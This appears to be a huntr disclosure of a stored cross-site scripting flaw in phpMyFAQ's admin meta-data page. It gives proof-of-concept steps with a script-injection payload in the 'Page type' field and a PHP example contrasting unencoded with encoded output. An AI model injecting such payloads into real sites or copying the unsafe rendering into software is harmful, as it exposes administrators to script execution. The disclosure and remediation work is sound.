huntr | Sk4rl1ght | 613143A1-8E51-449A-B214-12458308835D
Oct 20, 2022 - 10:37 a.m.

Stored Cross-site scripting

2022-10-20 10:37:59
sk4rl1ght
www.huntr.dev
injected scripts
malicious payload
web security
phpmyfaq
attack prevention

EPSS: 0.001 (Low), percentile 21.6%

Description

Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites.

Proof of Concept

1. Visit: http://<ip>/phpmyfaq/admin/?action=meta
2. Click the button "Add template meta data".
3. Inject the payload in the field "Page type": "><script>alert("XSS")</script> and save.
4. Every time you go to http://<ip>/phpmyfaq/admin/?action=meta, the XSS payload will execute.

Image POC: https://drive.google.com/file/d/1iezIdmxcCBY8G714AUFGIm3fI145yiC1/view?usp=sharing
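
The leading `">` in the payload indicates that the stored "Page type" value reaches the admin page's HTML without output encoding, most likely inside a double-quoted attribute (an assumption; the report does not show the template). The following is an added example, not phpMyFAQ's code: the function names, field names and allowlist pattern are hypothetical and the rows are constructed. It shows the unencoded rendering next to the encoded one.

```php
<?php
declare(strict_types=1);

// Constructed sample rows standing in for stored template meta data.
// Field names are hypothetical, not phpMyFAQ's actual schema.
$rows = [
    ['id' => 1, 'page_type' => 'article'],
    ['id' => 2, 'page_type' => '"><script>alert("XSS")</script>'],
];

// Unsafe: the stored value is concatenated into markup as-is, so a value
// containing "> closes the attribute and the tag, and the rest is parsed as HTML.
function renderRowUnsafe(array $row): string
{
    return '<input name="page_type" value="' . $row['page_type'] . '">';
}

// Encode at output time. ENT_QUOTES covers both quote styles; ENT_SUBSTITUTE
// replaces invalid byte sequences instead of returning an empty string.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Safe: the same markup, with the stored value encoded for HTML.
function renderRowSafe(array $row): string
{
    return '<input name="page_type" value="' . e($row['page_type']) . '">';
}

// Defense in depth on input: accept only a short identifier-like value.
// The pattern is an assumed policy for this example.
function isValidPageType(string $value): bool
{
    return preg_match('/\A[A-Za-z0-9_-]{1,32}\z/', $value) === 1;
}

foreach ($rows as $row) {
    printf("id=%d accepted_on_input=%s\n", $row['id'], isValidPageType($row['page_type']) ? 'yes' : 'no');
    printf("  unsafe: %s\n", renderRowUnsafe($row));
    printf("  safe:   %s\n", renderRowSafe($row));
}
```

Output encoding is what removes the stored XSS; the input check only narrows what can be stored and does not replace encoding on every page that displays the value.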
